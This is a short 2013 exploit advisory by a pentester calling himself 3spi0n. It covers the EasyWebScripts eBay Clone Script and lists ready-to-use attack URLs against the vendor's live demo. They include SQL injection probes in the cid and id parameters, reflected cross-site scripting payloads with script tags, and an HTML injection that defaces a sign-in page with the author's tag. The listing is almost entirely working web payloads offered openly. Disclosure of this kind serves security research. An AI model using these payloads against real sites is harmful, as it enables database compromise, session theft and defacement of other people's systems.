Home / exploits EasyWebScripts eBay Clone Script SQL Injection
Posted on 22 February 2013
################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ / / ___/ ___/ __ `/ ___/ / _ / ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## EasyWebScripts eBay Clone Script, Multiple Vulnerabilities Software Page: http://easywebscripts.com/product_details.php?item_id=10 Script Demo: http://easywebscripts.com/ebay Author(Pentester): 3spi0n On Social: Twitter.Com/eyyamgudeer Greetz: Grayhatz Inc. and Janissaries Platform. ################################################################################## [1] MySQL Injection on Script [+] (gallery.php, cid Param) >>> http://easywebscripts.com/ebay/gallery.php?cid=1' (MySQLi Found) [+] (product_desc.php, id Param) >>> http://easywebscripts.com/ebay/product_desc.php?id=1' (MySQLi Found) [+] (showcategory.php, cid Param) >>> http://easywebscripts.com/ebay/showcategory.php?cid=536' (MySQLi Found) [2] Cross Site Scripting (XSS) on Script [+] (lostpassword.php, msg Param) >>> http://easywebscripts.com//ebay/lostpassword.php?msg='"()%26%251<script>prompt(99456454)</script> [+] (showcategory.php, pg Param) >>> http://easywebscripts.com//ebay/showcategory.php?cid=0&pg='"()%26%251<script>prompt(54648451)</script>&type=6 [+] (signinform.php, msg Param) >>> http://easywebscripts.com/ebay/signinform.php?msg='"()%26%251<script>prompt(54648451)</script> [3] CRLF injection/HTTP response splitting on Script [+] (signinform.php, msg Param) >>> http://easywebscripts.com//ebay/signinform.php?msg=<h1><marquee>Inj3ct3d by 3spi0n</marquee></h1>
